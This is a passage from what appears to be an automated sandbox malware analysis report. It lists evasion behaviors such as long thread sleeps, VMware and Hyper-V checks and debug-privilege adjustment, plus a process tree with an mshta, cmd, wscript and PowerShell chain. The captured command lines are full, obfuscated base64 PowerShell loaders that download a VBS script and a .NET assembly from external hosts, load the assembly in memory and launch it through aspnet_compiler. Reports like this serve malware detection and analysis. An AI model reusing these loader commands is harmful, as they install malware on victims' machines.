        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5719Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dk54el2n\dk54el2n.dllJump to dropped file
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7504Thread sleep count: 6721 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7508Thread sleep count: 2909 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7552Thread sleep time: -7378697629483816s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7852Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7912Thread sleep count: 4067 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7916Thread sleep count: 5719 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7948Thread sleep time: -17524406870024063s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: powershell.exe, 00000003.00000002.1798045854.0000000004D58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
        Source: wscript.exe, 00000006.00000002.1789372931.0000000005845000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: powershell.exe, 00000003.00000002.1798045854.0000000004D58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
        Source: powershell.exe, 00000003.00000002.1803659216.0000000008429000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1803659216.00000000084AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: wscript.exe, 00000006.00000002.1789372931.000000000584F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
        Source: powershell.exe, 00000003.00000002.1803659216.0000000008429000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWK
        Source: powershell.exe, 00000003.00000002.1798045854.0000000004D58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
        Source: powershell.exe, 00000009.00000002.1836478008.00000000087EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: Yara matchFile source: amsi32_7864.amsi.csv, type: OTHER
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7864, type: MEMORYSTR
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFtbycrJ2NoYXZpbGhhKTs0QW1wcmVzdW0nKydwdHUnKydvc28gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg0JysnQW1saW5mb3RvbScrJ2lhKTs0QW1uaXRpZHVsYXIgPSBzSVc8PEJBJysnU0U2NF9TVEFSVD4+c0lXOzRBbW9idm9sdmlkbyA9IHNJVycrJzw8QkFTRTYnKyc0X0VORD4+c0lXOzRBbWxvZ29ncmlmbyA9IDRBbXByJysnZXN1bXB0dW9zby5JbmRleE9mKDRBbW5pdGknKydkdWxhcicrJyk7NEFtdG9saGlkbyA9IDRBbXByZXN1bXB0dW9zby5JbmRleE9mKDRBbW8nKydidm9sdmlkbyk7NEFtbG9nb2dyaWZvIC1nZSAwIC1hbmQgNEFtdG9saGlkbyAtZ3QgNEFtbG9nb2dyaWZvOzRBbWxvZ29ncmlmbyArPSA0QW1uaXRpZHVsYXIuTGVuZycrJ3RoOzRBbXZpbmRpdGEgPSA0QW10b2xoaWRvIC0gNEFtbG9nb2dyaWZvOzRBbScrJ2ZpZ2EgPSA0QW1wcmVzdW1wdHVvc28uU3Vic3RyaW5nKDRBbWxvZ29ncmlmbywgNEFtdmluZGl0YSk7NEFtYW50aWdhbWVudGUgPSAtam9pbiAoNEFtZmlnYS5UbycrJ0NoYXJBcnJhJysneSgpIFMnKydFMiBGb3JFYWNoLU9iamUnKydjdCB7IDRBbV8gfSlbLTEuLi0oNEFtZmlnYS5MZW5ndGgpXTs0QW1tYScrJ3Jtb3InKydpemFyJysnID0gWycrJ1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyg0QW1hbnRpZ2FtZW50ZSk7NEFtZGVzZW1tYWRlaXJhciA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoNEFtbWFybW9yaXphcik7NEFtcG9lJysndGlmaWNhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QocycrJ0lXVkFJcycrJ0lXKTs0QW0nKydwb2V0aWZpY2FyLkludm9rZSg0QW1udWxsLCBAKHNJV3R4dC5WR0ZSRS8zNDMxLzkyLjMyMS41NDIuMjcxLy86cHR0aHNJVywgc0lXNEFtZGUnKydzdW5pZmljYXJzSVcsIHNJVzRBbWRlc3VuaWZpY2Fyc0lXLCBzSVc0QW1kZXN1bmlmaWNhcnNJVywgc0lXYXNwbmV0X2NvbXBpbGVyc0lXLCBzSVc0JysnQW1kZXN1bmlmaWNhcnNJVywgc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYScrJ3JzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXMXNJVyxzSScrJ1c0QW1kZXN1bmlmaWNhcnNJVykpOycpIC1jUkVQbEFjZSAoW2NoYVJdNTIrW2NoYVJdNjUrW2NoYVJdMTA5KSxbY2hhUl0zNiAtY1JFUGxBY2UgJ3NJVycsW2NoYVJdMzkgIC1jUkVQbEFjZShbY2hhUl04MytbY2hhUl02OStbY2hhUl01MCksW2NoYVJdMTI0KSB8ICYoICRFTnY6Q29tc3BFY1s0LDI0LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dk54el2n\dk54el2n.cmdline"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS" Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9C55.tmp" "c:\Users\user\AppData\Local\Temp\dk54el2n\CSC71BE0DF5A47E408EAC9C81C5574F338.TMP"Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFtbycrJ2NoYXZpbGhhKTs0QW1wcmVzdW0nKydwdHUnKydvc28gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg0JysnQW1saW5mb3RvbScrJ2lhKTs0QW1uaXRpZHVsYXIgPSBzSVc8PEJBJysnU0U2NF9TVEFSVD4+c0lXOzRBbW9idm9sdmlkbyA9IHNJVycrJzw8QkFTRTYnKyc0X0VORD4+c0lXOzRBbWxvZ29ncmlmbyA9IDRBbXByJysnZXN1bXB0dW9zby5JbmRleE9mKDRBbW5pdGknKydkdWxhcicrJyk7NEFtdG9saGlkbyA9IDRBbXByZXN1bXB0dW9zby5JbmRleE9mKDRBbW8nKydidm9sdmlkbyk7NEFtbG9nb2dyaWZvIC1nZSAwIC1hbmQgNEFtdG9saGlkbyAtZ3QgNEFtbG9nb2dyaWZvOzRBbWxvZ29ncmlmbyArPSA0QW1uaXRpZHVsYXIuTGVuZycrJ3RoOzRBbXZpbmRpdGEgPSA0QW10b2xoaWRvIC0gNEFtbG9nb2dyaWZvOzRBbScrJ2ZpZ2EgPSA0QW1wcmVzdW1wdHVvc28uU3Vic3RyaW5nKDRBbWxvZ29ncmlmbywgNEFtdmluZGl0YSk7NEFtYW50aWdhbWVudGUgPSAtam9pbiAoNEFtZmlnYS5UbycrJ0NoYXJBcnJhJysneSgpIFMnKydFMiBGb3JFYWNoLU9iamUnKydjdCB7IDRBbV8gfSlbLTEuLi0oNEFtZmlnYS5MZW5ndGgpXTs0QW1tYScrJ3Jtb3InKydpemFyJysnID0gWycrJ1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyg0QW1hbnRpZ2FtZW50ZSk7NEFtZGVzZW1tYWRlaXJhciA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoNEFtbWFybW9yaXphcik7NEFtcG9lJysndGlmaWNhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QocycrJ0lXVkFJcycrJ0lXKTs0QW0nKydwb2V0aWZpY2FyLkludm9rZSg0QW1udWxsLCBAKHNJV3R4dC5WR0ZSRS8zNDMxLzkyLjMyMS41NDIuMjcxLy86cHR0aHNJVywgc0lXNEFtZGUnKydzdW5pZmljYXJzSVcsIHNJVzRBbWRlc3VuaWZpY2Fyc0lXLCBzSVc0QW1kZXN1bmlmaWNhcnNJVywgc0lXYXNwbmV0X2NvbXBpbGVyc0lXLCBzSVc0JysnQW1kZXN1bmlmaWNhcnNJVywgc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYScrJ3JzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXMXNJVyxzSScrJ1c0QW1kZXN1bmlmaWNhcnNJVykpOycpIC1jUkVQbEFjZSAoW2NoYVJdNTIrW2NoYVJdNjUrW2NoYVJdMTA5KSxbY2hhUl0zNiAtY1JFUGxBY2UgJ3NJVycsW2NoYVJdMzkgIC1jUkVQbEFjZShbY2hhUl04MytbY2hhUl02OStbY2hhUl01MCksW2NoYVJdMTI0KSB8ICYoICRFTnY6Q29tc3BFY1s0LDI0LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')"Jump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jhfidmrdtlazwcagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagyurelvrzugugicagicagicagicagicagicagicagicagicagicagic1nzw1izxjeruzjtkluaw9oicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjmtw9uiiwgicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagiezocepjs3asc3ryaw5nicagicagicagicagicagicagicagicagicagicagicb5r09zte1jlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagckfuylbolhvpbnqgicagicagicagicagicagicagicagicagicagicagifhuvmjyqyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagigtoennhau9lktsnicagicagicagicagicagicagicagicagicagicagicatbmftrsagicagicagicagicagicagicagicagicagicagicagimpmymzusnjtsxvqiiagicagicagicagicagicagicagicagicagicagicaglw5bbwvzugfjzsagicagicagicagicagicagicagicagicagicagicagqxcgicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicrxynzkq05qm1g6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjq1ljeymy4yos8xmzqzl3nlzw1lymvzdhroaw5nc3dpdghlbnrpcmv0agluz3n3axroz3jlyxruyxr1cmv0agluz3mudelgiiwijgvuvjpbufbeqvrbxhnlzw1lymvzdhroaw5nc3dpdghlbnrpcmv0agluz3n3axroz3jlyxruyxr1cmv0agluzy52ylmildasmck7c1rhulqtu0xlzvaomyk7aukgicagicagicagicagicagicagicagicagicagicagicikrw52okfquerbvefcc2vlbwvizxn0dghpbmdzd2l0agvudglyzxroaw5nc3dpdghncmvhdg5hdhvyzxroaw5nlnziuyi='+[char]34+'))')))"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jhfidmrdtlazwcagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagyurelvrzugugicagicagicagicagicagicagicagicagicagicagic1nzw1izxjeruzjtkluaw9oicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjmtw9uiiwgicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagiezocepjs3asc3ryaw5nicagicagicagicagicagicagicagicagicagicagicb5r09zte1jlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagckfuylbolhvpbnqgicagicagicagicagicagicagicagicagicagicagifhuvmjyqyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagigtoennhau9lktsnicagicagicagicagicagicagicagicagicagicagicatbmftrsagicagicagicagicagicagicagicagicagicagicagimpmymzusnjtsxvqiiagicagicagicagicagicagicagicagicagicagicaglw5bbwvzugfjzsagicagicagicagicagicagicagicagicagicagicagqxcgicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicrxynzkq05qm1g6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjq1ljeymy4yos8xmzqzl3nlzw1lymvzdhroaw5nc3dpdghlbnrpcmv0agluz3n3axroz3jlyxruyxr1cmv0agluz3mudelgiiwijgvuvjpbufbeqvrbxhnlzw1lymvzdhroaw5nc3dpdghlbnrpcmv0agluz3n3axroz3jlyxruyxr1cmv0agluzy52ylmildasmck7c1rhulqtu0xlzvaomyk7aukgicagicagicagicagicagicagicagicagicagicagicikrw52okfquerbvefcc2vlbwvizxn0dghpbmdzd2l0agvudglyzxroaw5nc3dpdghncmvhdg5hdhvyzxroaw5nlnziuyi='+[char]34+'))')))"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnneftb2noyxzpbghhid0gc0lxahr0chm6ly8zmtankyc1lmzpbgvtywlslmnvbs9hcgkvzmlszs9nzxq/zmlszwtlet1zafrqsccrj2jdufg4bycrjy1st3rdcuhmrzzfmhgnkyddes14bdr0bnhsqvziutk1lwr2jysnavrlnwnbuicrj2fozffqymizbwv4zndrekttvfhnjnnraxbyzwc9dhj1zszwa192ascrj2q9ztaxjysnmdk2mzhjowjmyjk1nze3mzi1mzenkyczmdlinwzmn2mgc0lxozrbbxryawnoaxntbya9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7neftbgluzm90b21pysa9iccrjzrbbxryawnoaxntby5eb3dubg9hzerhdgeoneftbycrj2noyxzpbghhkts0qw1wcmvzdw0nkydwdhunkydvc28gpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzyg0jysnqw1saw5mb3rvbscrj2lhkts0qw1uaxrpzhvsyxigpsbzsvc8pejbjysnu0u2nf9tvefsvd4+c0lxozrbbw9idm9sdmlkbya9ihnjvycrjzw8qkftrtynkyc0x0vord4+c0lxozrbbwxvz29ncmlmbya9idrbbxbyjysnzxn1bxb0dw9zby5jbmrlee9mkdrbbw5pdgknkydkdwxhcicrjyk7neftdg9saglkbya9idrbbxbyzxn1bxb0dw9zby5jbmrlee9mkdrbbw8nkydidm9sdmlkbyk7neftbg9nb2dyawzvic1nzsawic1hbmqgneftdg9saglkbyatz3qgneftbg9nb2dyawzvozrbbwxvz29ncmlmbyarpsa0qw1uaxrpzhvsyxiutgvuzycrj3roozrbbxzpbmrpdgegpsa0qw10b2xoawrvic0gneftbg9nb2dyawzvozrbbscrj2zpz2egpsa0qw1wcmvzdw1wdhvvc28uu3vic3ryaw5nkdrbbwxvz29ncmlmbywgneftdmluzgl0ysk7neftyw50awdhbwvudgugpsatam9pbiaoneftzmlnys5ubycrj0noyxjbcnjhjysnesgpifmnkydfmibgb3jfywnolu9iamunkydjdcb7idrbbv8gfslblteuli0oneftzmlnys5mzw5ndggpxts0qw1tyscrj3jtb3inkydpemfyjysnid0gwycrj1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cml